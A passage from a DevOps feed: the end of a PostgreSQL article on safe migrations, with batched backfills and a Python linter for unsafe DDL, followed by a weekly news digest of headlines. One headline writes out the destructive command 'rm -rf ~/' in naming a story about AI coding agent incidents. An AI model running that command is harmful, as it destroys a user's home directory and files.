        </h2><p>When you backfill a column on a large table, do not run one big <code>UPDATE</code>. A single <code>UPDATE users SET email_verified = false WHERE email_verified IS NULL</code> on 40 million rows holds locks for the whole run, builds a huge transaction, and bloats the table with dead rows that vacuum has to clean up later.</p>
<p>Batch it. Each batch updates a few thousand rows and commits, so transactions stay short and other queries keep moving. A stored procedure with <code>COMMIT</code> inside the loop (PostgreSQL 11+) is the cleanest copy-paste version:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">PROCEDURE</span> backfill_email_verified()
<span class="hljs-keyword">LANGUAGE</span> plpgsql <span class="hljs-keyword">AS</span> $$
<span class="hljs-keyword">DECLARE</span>
  affected <span class="hljs-type">integer</span>;
<span class="hljs-keyword">BEGIN</span>
  LOOP
    <span class="hljs-keyword">UPDATE</span> users
    <span class="hljs-keyword">SET</span> email_verified <span class="hljs-operator">=</span> <span class="hljs-literal">false</span>
    <span class="hljs-keyword">WHERE</span> id <span class="hljs-keyword">IN</span> (
      <span class="hljs-keyword">SELECT</span> id <span class="hljs-keyword">FROM</span> users
      <span class="hljs-keyword">WHERE</span> email_verified <span class="hljs-keyword">IS</span> <span class="hljs-keyword">NULL</span>
      LIMIT <span class="hljs-number">5000</span>
    );
    <span class="hljs-keyword">GET</span> DIAGNOSTICS affected <span class="hljs-operator">=</span> ROW_COUNT;
    EXIT <span class="hljs-keyword">WHEN</span> affected <span class="hljs-operator">=</span> <span class="hljs-number">0</span>;  <span class="hljs-comment">-- nothing left to update</span>
    <span class="hljs-keyword">COMMIT</span>;                  <span class="hljs-comment">-- commit each batch, release locks</span>
  <span class="hljs-keyword">END</span> LOOP;
<span class="hljs-keyword">END</span>;
$$;

<span class="hljs-keyword">CALL</span> backfill_email_verified();
</code></pre><p>If the backfill is putting too much load on the database, add a small <code>PERFORM pg_sleep(0.1)</code> before the <code>COMMIT</code> to slow it down. Five thousand rows per batch is a reasonable starting point. Tune it based on row size and how much replication lag you can tolerate, because every batch ships to your replicas too.</p>
<p>When the backfill finishes, drop the procedure:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">DROP</span> <span class="hljs-keyword">PROCEDURE</span> backfill_email_verified;
</code></pre><h2 id="h2-a-migration-checklist-before-you-ship" class="group relative scroll-mt-24">
        <a href="#h2-a-migration-checklist-before-you-ship" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          A migration checklist before you ship
        </a>
        </h2><p>Run through this before any production migration:</p>
<ul>
<li>Does every statement set <code>lock_timeout</code>?</li>
<li>Is every index built with <code>CONCURRENTLY</code>, outside a transaction block?</li>
<li>Does any statement rewrite or scan a large table while holding <code>ACCESS EXCLUSIVE</code>? If so, split it with <code>NOT VALID</code> plus <code>VALIDATE</code>, or move to expand-and-contract.</li>
<li>Is the migration backward compatible with the code currently running? It has to be, because old and new code run side by side during a deploy.</li>
<li>Did you test it against a staging database with production-like row counts and a long-running query in another session to trigger the lock queue?</li>
</ul>
<h2 id="h2-next-steps" class="group relative scroll-mt-24">
        <a href="#h2-next-steps" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Next steps
        </a>
        </h2><p>Pick your worst offender and fix it this week. Grep your migration history for <code>CREATE INDEX</code> without <code>CONCURRENTLY</code> and for <code>ADD COLUMN ... NOT NULL</code>. Those two patterns cause most of the outages.</p>
<p>Then make the safe path the default so people do not have to remember it:</p>
<ul>
<li>Set <code>lock_timeout</code> in <code>postgresql.conf</code> (or per-role) for the account your migrations run as, so a forgotten <code>SET</code> does not cost you an outage.</li>
<li>Add a linter to CI that fails the build on unsafe DDL. If you use Rails, the <a href="https://github.com/ankane/strong_migrations">strong_migrations</a> gem flags these patterns before they merge. Django, Flyway, and Liquibase have similar checks or plugins. For raw SQL, <a href="https://github.com/sbdchd/squawk">squawk</a> lints migration files directly.</li>
<li>Put a slow query holding a read lock into your staging test suite so a missing <code>lock_timeout</code> shows up before it reaches production.</li>
</ul>
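<p>As an added example (not code from this article or from the linters linked above), here is a small Python check that applies the checklist and the two grep patterns to a migration file. The rule names and the two sample migrations are constructed for illustration, and the matching is a regex heuristic, not a SQL parser.</p>

```python
import re

DDL = re.compile(r"(ALTER TABLE|CREATE (UNIQUE )?INDEX|DROP INDEX)\b")
INDEX = re.compile(r"(CREATE (UNIQUE )?|DROP )INDEX\b")
DOLLAR_TAG = re.compile(r"\$([A-Za-z_]\w*)?\$")


def split_statements(sql):
    """Split on ';' while ignoring -- comments, '...' strings and $tag$ bodies."""
    stmts, buf, i, dollar, in_str = [], [], 0, None, False
    while i < len(sql):
        ch = sql[i]
        if dollar:
            if sql.startswith(dollar, i):      # closing tag of the quoted body
                buf.append(dollar)
                i += len(dollar)
                dollar = None
                continue
        elif in_str:
            in_str = ch != "'"
        elif sql.startswith("--", i):          # drop the comment up to end of line
            nl = sql.find("\n", i)
            i = len(sql) if nl == -1 else nl
            continue
        elif ch == "'":
            in_str = True
        elif ch == "$" and DOLLAR_TAG.match(sql, i):
            dollar = DOLLAR_TAG.match(sql, i).group(0)
            buf.append(dollar)
            i += len(dollar)
            continue
        elif ch == ";":
            stmts.append("".join(buf))
            buf = []
            i += 1
            continue
        buf.append(ch)
        i += 1
    stmts.append("".join(buf))
    return [" ".join(s.split()) for s in stmts if s.strip()]


def lint(sql):
    """Return (statement_number, rule) findings for one migration file."""
    findings, timeout_set, in_txn, validated = [], False, False, set()
    for num, stmt in enumerate(split_statements(sql), 1):
        up = stmt.upper()
        if re.match(r"SET (LOCAL |SESSION )?LOCK_TIMEOUT\b", up):
            timeout_set = True
        elif re.match(r"(BEGIN|START TRANSACTION)\b", up):
            in_txn = True
        elif re.match(r"(COMMIT|ROLLBACK|END)\b", up):
            in_txn = False
        if DDL.match(up) and not timeout_set:
            findings.append((num, "missing-lock-timeout"))
        if INDEX.match(up):
            if not re.search(r"\bCONCURRENTLY\b", up):
                findings.append((num, "index-not-concurrent"))
            elif in_txn:                       # CONCURRENTLY cannot run in a transaction block
                findings.append((num, "concurrently-in-transaction"))
        alter = re.match(r"ALTER TABLE (?:IF EXISTS )?(?:ONLY )?(\S+) (.*)", up)
        if not alter:
            continue
        table, action = alter.groups()
        if action.startswith("VALIDATE CONSTRAINT"):
            validated.add(table)               # a validated CHECK may back a later SET NOT NULL
        if re.search(r"\bADD COLUMN\b.*\bNOT NULL\b", action):
            findings.append((num, "add-column-not-null"))
        if re.search(r"\bRENAME COLUMN\b", action):
            findings.append((num, "rename-column"))
        if (re.search(r"\bADD CONSTRAINT\b.*\b(CHECK|FOREIGN KEY)\b", action)
                and "NOT VALID" not in action):
            findings.append((num, "constraint-without-not-valid"))
        if re.search(r"\bSET NOT NULL\b", action) and table not in validated:
            findings.append((num, "set-not-null-without-validated-check"))
    return findings


# Constructed sample: every pattern the article warns about, in one transaction.
UNSAFE = """
BEGIN;
CREATE INDEX idx_users_email ON users (email);
ALTER TABLE users ADD COLUMN email_verified boolean NOT NULL DEFAULT false;
ALTER TABLE users RENAME COLUMN name TO full_name;
ALTER TABLE orders ADD CONSTRAINT orders_customer_fk
  FOREIGN KEY (customer_id) REFERENCES customers (id);
COMMIT;
"""

# Constructed sample: the article's NOT VALID / VALIDATE sequence.
SAFE = """
SET lock_timeout = '3s';
ALTER TABLE users ADD COLUMN email_verified boolean;
-- backfill here; then:
ALTER TABLE users ADD CONSTRAINT users_email_verified_not_null
  CHECK (email_verified IS NOT NULL) NOT VALID;
ALTER TABLE users VALIDATE CONSTRAINT users_email_verified_not_null;
ALTER TABLE users ALTER COLUMN email_verified SET NOT NULL;
ALTER TABLE users DROP CONSTRAINT users_email_verified_not_null;
CREATE INDEX CONCURRENTLY idx_users_email ON users (email);
"""

if __name__ == "__main__":
    for num, rule in lint(UNSAFE):
        print(f"statement {num}: {rule}")
```

<p>In CI, run <code>lint()</code> over each new migration file and fail the build when it returns any finding.</p>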
<p>The goal is not to memorize every lock level. It is to make the table stay online no matter what a migration does. Set the timeout, build concurrently, expand before you contract, and backfill in batches. Do those four things and the 2am index that took down <code>orders</code> becomes a migration that fails loudly in staging and ships quietly to production.</p>
<p>Sources:</p>
<ul>
<li><a href="https://www.postgresql.org/docs/current/explicit-locking.html">PostgreSQL: Explicit Locking</a></li>
<li><a href="https://www.postgresql.org/docs/current/sql-altertable.html">PostgreSQL: ALTER TABLE</a></li>
<li><a href="https://www.postgresql.org/docs/current/sql-createindex.html#SQL-CREATEINDEX-CONCURRENTLY">PostgreSQL: CREATE INDEX (CONCURRENTLY)</a></li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 23, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-23</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 01 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-23</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-dynamic-configuration-for-cloud-native-swift-services" class="group relative scroll-mt-24">
        <a href="#h3-dynamic-configuration-for-cloud-native-swift-services" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Dynamic configuration for cloud native Swift services
        </a>
        </h3><p>Modern Swift services increasingly run alongside the same cloud native infrastructure stacks that power much of today’s Kubernetes ecosystem — including ConfigMaps, containerized workloads, declarativ</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/01/dynamic-configuration-for-cloud-native-swift-services/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads" class="group relative scroll-mt-24">
        <a href="#h3-scaling-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling StarRocks on Amazon EKS with KEDA and Karpenter for enterprise OLAP workloads
        </a>
        </h3><p>Financial analytics at enterprise scale is unforgiving. Queries must return in seconds, not minutes. Thousands of finance professionals need concurrent access during monthly close cycles. And when dat</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/scaling-apache-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security" class="group relative scroll-mt-24">
        <a href="#h3-building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building a cloud native internal developer platform with Kubernetes, GitOps, and supply chain security
        </a>
        </h3><p>Modern software delivery is no longer constrained by application code — it is constrained by the platform that runs it. This article presents the design of a cloud-native Internal Developer Platform (</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/29/building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-vm-migration-what-comes-after-the-lift-and-shift" class="group relative scroll-mt-24">
        <a href="#h3-beyond-vm-migration-what-comes-after-the-lift-and-shift" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond VM migration: What comes after the lift-and-shift
        </a>
        </h3><p>I&#39;ve had this conversation dozens of times with infrastructure teams. They&#39;ve just finished, or are deep into, a VM migration off a legacy hypervisor. The hard part is nearly done. Or, so they think.H</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/beyond-vm-migration-what-comes-after-lift-and-shift"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-security-notice-former-helm-apt-mirror-domain-baltocdncom-statement" class="group relative scroll-mt-24">
        <a href="#h3-security-notice-former-helm-apt-mirror-domain-baltocdncom-statement" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Security Notice: Former Helm APT Mirror Domain baltocdn.com Statement
        </a>
        </h3><p>The Helm Security Team has received third-party reports that the ownership on the former community-maintained Debian/Ubuntu APT mirror domain, baltocdn.com, has changed after baltocdn.com&#39;s original r</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Helm Blog</strong></p>
<p><a href="https://helm.sh/blog/security-notice-baltocdn"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-kubernetes-integration-tax-prometheus-cilium-and-production-reality" class="group relative scroll-mt-24">
        <a href="#h3-the-kubernetes-integration-tax-prometheus-cilium-and-production-reality" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Kubernetes integration tax: Prometheus, Cilium and production reality
        </a>
        </h3><p>I still remember the first time we lost sleep over something that wasn’t a bug. It was a Tuesday. Grafana dashboards showed blank panels for Cilium network metrics. Hubble was working fine — DNS visib</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/28/the-kubernetes-integration-tax-prometheus-cilium-and-production-reality/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kiali-and-mcp-bringing-ai-native-observability-to-red-hat-openshift-service-mesh" class="group relative scroll-mt-24">
        <a href="#h3-kiali-and-mcp-bringing-ai-native-observability-to-red-hat-openshift-service-mesh" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kiali and MCP: Bringing AI-native observability to Red Hat OpenShift Service Mesh
        </a>
        </h3><p>The model context protocol (MCP) server for Kubernetes is moving toward technology preview (TP), and it’s bringing a powerhouse integration with it: the Kiali toolset. By integrating Kiali into the MC</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/kiali-and-mcp-bring-ai-native-observability-red-hat-openshift-service-mesh"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-136-with-ryota-sawada" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-136-with-ryota-sawada" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes 1.36, with Ryota Sawada
        </a>
        </h3><p>Ryota Sawada is software engineer at Numtide and the release lead of Kubernetes 1.36 code name Haru. He has over a decade of experience mainly in the finance industry including working on Cloud Native</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Kubernetes Podcast</strong></p>
<p><a href="https://e780d51f-f115-44a6-8252-aed9216bb521.libsyn.com/kubernetes-136-with-ryota-sawada"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler" class="group relative scroll-mt-24">
        <a href="#h3-gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GPU autoscaling on Kubernetes with KEDA: Building an external scaler
        </a>
        </h3><p>If you run GPU workloads on Kubernetes — vLLM, Triton, training jobs, or the newer agentic inference stacks — you’ve probably hit a familiar problem: the default autoscaling path still reasons about C</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/27/gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-reconciling-the-past-correcting-records-for-unfixed-kubernetes-cves" class="group relative scroll-mt-24">
        <a href="#h3-reconciling-the-past-correcting-records-for-unfixed-kubernetes-cves" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Reconciling the Past: Correcting Records for Unfixed Kubernetes CVEs
        </a>
        </h3><p>The Kubernetes project relies on transparency to empower cluster administrators and security researchers. One important way we do that is by publishing CVE records into the Common Vulnerabilities and </p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/26/reconciling-unfixed-kubernetes-cves/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-coding-agent-horror-stories-the-rm-rf-incident" class="group relative scroll-mt-24">
        <a href="#h3-coding-agent-horror-stories-the-rm-rf-incident" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Coding Agent Horror Stories: The rm -rf ~/ Incident
        </a>
        </h3><p>This is Part 2 of our AI Coding Agent Horror Stories series, an in-depth look at real-world security incidents exposing the vulnerabilities in AI coding agents, and how Docker Sandboxes deliver worksp</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/coding-agent-horror-stories-the-rm-rf-incident/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai" class="group relative scroll-mt-24">
        <a href="#h3-how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How IBM Apptio Delivers Data Center Value in the Age of AI
        </a>
        </h3><p>As organizations accelerate their adoption of AI and use of hybrid infrastructure, data center efficiency has become a direct constraint of business modernization and growth. Global demand for data ce</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Kubecost Blog</strong></p>
<p><a href="https://www.apptio.com/blog/how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-tuning-windows-vm-performance-on-suse-virtualization" class="group relative scroll-mt-24">
        <a href="#h3-tuning-windows-vm-performance-on-suse-virtualization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Tuning Windows VM Performance on SUSE Virtualization
        </a>
        </h3><p>SUSE Virtualization is a cloud native hyperconverged infrastructure platform solution optimized for running virtual machine and container workloads in the data center, multi-cloud and edge environment</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/tuning-windows-vm-performance-on-suse-virtualization/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-vmware-hypervisor-deployment-using-maas" class="group relative scroll-mt-24">
        <a href="#h3-vmware-hypervisor-deployment-using-maas" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 VMware hypervisor deployment using MAAS
        </a>
        </h3><p>Most modern datacenters are inherently heterogeneous. VMware environments coexist with container platforms, databases, and other bare-metal workloads, often on the same hardware over several years. Se</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/vmware-hypervisor-deployment-using-maas"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-4-reasons-to-start-using-image-mode-for-red-hat-enterprise-linux-right-now" class="group relative scroll-mt-24">
        <a href="#h3-4-reasons-to-start-using-image-mode-for-red-hat-enterprise-linux-right-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 4 reasons to start using image mode for Red Hat Enterprise Linux right now
        </a>
        </h3><p>Nearly two years ago, we launched image mode for Red Hat Enterprise Linux (RHEL) to give customers a simpler way to deploy the foundation of their IT enterprise. Since then, I’ve heard users who have </p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/4-reasons-start-using-image-mode-red-hat-enterprise-linux-right-now"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-mitigating-cve-2026-31431-copy-fail-in-docker-engine" class="group relative scroll-mt-24">
        <a href="#h3-mitigating-cve-2026-31431-copy-fail-in-docker-engine" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Mitigating CVE-2026-31431 (“Copy Fail”) in Docker Engine
        </a>
        </h3><p>CVE-2026-31431 is a Linux kernel vulnerability that was recently disclosed. This CVE does not compromise Docker infrastructure. That said, Docker Engine&#39;s default profiles prior to v29.4.3 allowed con</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/mitigating-cve-2026-31431-copy-fail-in-docker-engine/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-untrusted-autonomous-workload-how-ai-coding-agents-reshape-what-isolation-has-to-do" class="group relative scroll-mt-24">
        <a href="#h3-the-untrusted-autonomous-workload-how-ai-coding-agents-reshape-what-isolation-has-to-do" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Untrusted Autonomous Workload: How AI Coding Agents Reshape What Isolation Has to Do
        </a>
        </h3><p>Earlier this year I mass-migrated my blog to Astro using Claude Code. 146 posts. 6,024 images. Canonical URLs, JSON-LD markup, sitemap generation, the whole stack. I&#39;d spent hours writing a skills fil</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/untrusted-autonomous-workload-ai-sandboxes/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        </h2><h3 id="h3-the-complete-ai-experimentation-guide-test-compare-validate-ship-safely" class="group relative scroll-mt-24">
        <a href="#h3-the-complete-ai-experimentation-guide-test-compare-validate-ship-safely" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Complete AI Experimentation Guide: Test, Compare, Validate &amp; Ship Safely
        </a>
        </h3><p>Artificial intelligence tools, particularly large language models (LLMs), aren’t like traditional software.</p>
<p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/ai-experimentation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-release-management-tools-what-they-are-and-how-they-work" class="group relative scroll-mt-24">
        <a href="#h3-release-management-tools-what-they-are-and-how-they-work" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Release management tools: What they are and how they work
        </a>
        </h3><p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/release-management-tools/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flags-vs-feature-branching-why-you-need-both-for-faster-safer-releases" class="group relative scroll-mt-24">
        <a href="#h3-feature-flags-vs-feature-branching-why-you-need-both-for-faster-safer-releases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flags vs Feature Branching: Why You Need Both for Faster, Safer Releases
        </a>
        </h3><p>Feature flags control features after deployment, while feature branching manages code before merge</p>
<p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/feature-flags-vs-feature-branching/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bigquery-cicd-with-harness-database-devops" class="group relative scroll-mt-24">
        <a href="#h3-bigquery-cicd-with-harness-database-devops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 BigQuery CI/CD with Harness Database DevOps
        </a>
        </h3><p>Automate BigQuery schema deployments with Harness using secure OIDC authentication and CI/CD pipelines.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/bigquery-ci-cd-and-database-devops-with-harness"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-still-a-developer-just-outside-our-latest-github-shop-collection-is-here" class="group relative scroll-mt-24">
        <a href="#h3-still-a-developer-just-outside-our-latest-github-shop-collection-is-here" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Still a developer. Just outside. Our latest GitHub Shop collection is here.
        </a>
        </h3><p>The ESC collection lets you escape the confines of your desk and get out into the sun where good ideas are bound to happen.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/still-a-developer-just-outside-our-latest-github-shop-collection-is-here/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-1901-18114-18107" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-1901-18114-18107" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 19.0.1, 18.11.4, 18.10.7
        </a>
        </h3><p><strong>📅 May 28, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-0-1-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-claude-opus-48-on-gitlab-complex-agentic-work-less-disruption" class="group relative scroll-mt-24">
        <a href="#h3-claude-opus-48-on-gitlab-complex-agentic-work-less-disruption" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Claude Opus 4.8 on GitLab: Complex agentic work, less disruption
        </a>
        </h3><p>Anthropic&#39;s latest model on GitLab is built for precise execution across complex multi-step agent work. Agents fail most often on complex, multi-step work: tasks that span multiple tools and go from i</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/claude-opus-4-8-on-gitlab/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-agentic-coding-is-only-as-good-as-its-context" class="group relative scroll-mt-24">
        <a href="#h3-agentic-coding-is-only-as-good-as-its-context" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Agentic coding is only as good as its context
        </a>
        </h3><p>Every week, another coding agent demo shows a prompt turning into a pull request in under five minutes. These demos often highlight a narrow use case not yet in production, and they skip everything th</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/agentic-coding-only-as-good-as-context/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-best-continuous-deployment-tools-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-the-best-continuous-deployment-tools-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Best Continuous Deployment Tools in 2026
        </a>
        </h3><p>Continuous Deployment is not the same as CI/CD. An honest ranking of the platforms that handle the deploy half: rollouts, traffic shifting, rollback, environment promotion.</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/best-continuous-deployment-tools-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-full-security-scanner-coverage-of-your-codebase-in-minutes" class="group relative scroll-mt-24">
        <a href="#h3-full-security-scanner-coverage-of-your-codebase-in-minutes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Full security scanner coverage of your codebase in minutes
        </a>
        </h3><p>Across the industry, every CI/CD platform faces the same challenge: As organizations grow, manually configuring scanners to run across every pipeline definition file isn&#39;t scalable. AI is accelerating</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/security-configuration-profiles/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-for-beginners-getting-started-with-git-and-github-in-vs-code" class="group relative scroll-mt-24">
        <a href="#h3-github-for-beginners-getting-started-with-git-and-github-in-vs-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub for Beginners: Getting started with Git and GitHub in VS Code
        </a>
        </h3><p>Discover how to use VS Code to interact with GitHub and maintain your projects.</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/developer-skills/github/github-for-beginners-getting-started-with-git-and-github-in-vs-code/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-stop-managing-start-orchestrating-streamlining-catalyst-operations-with-red-hat-ansible-automation-platform" class="group relative scroll-mt-24">
        <a href="#h3-stop-managing-start-orchestrating-streamlining-catalyst-operations-with-red-hat-ansible-automation-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
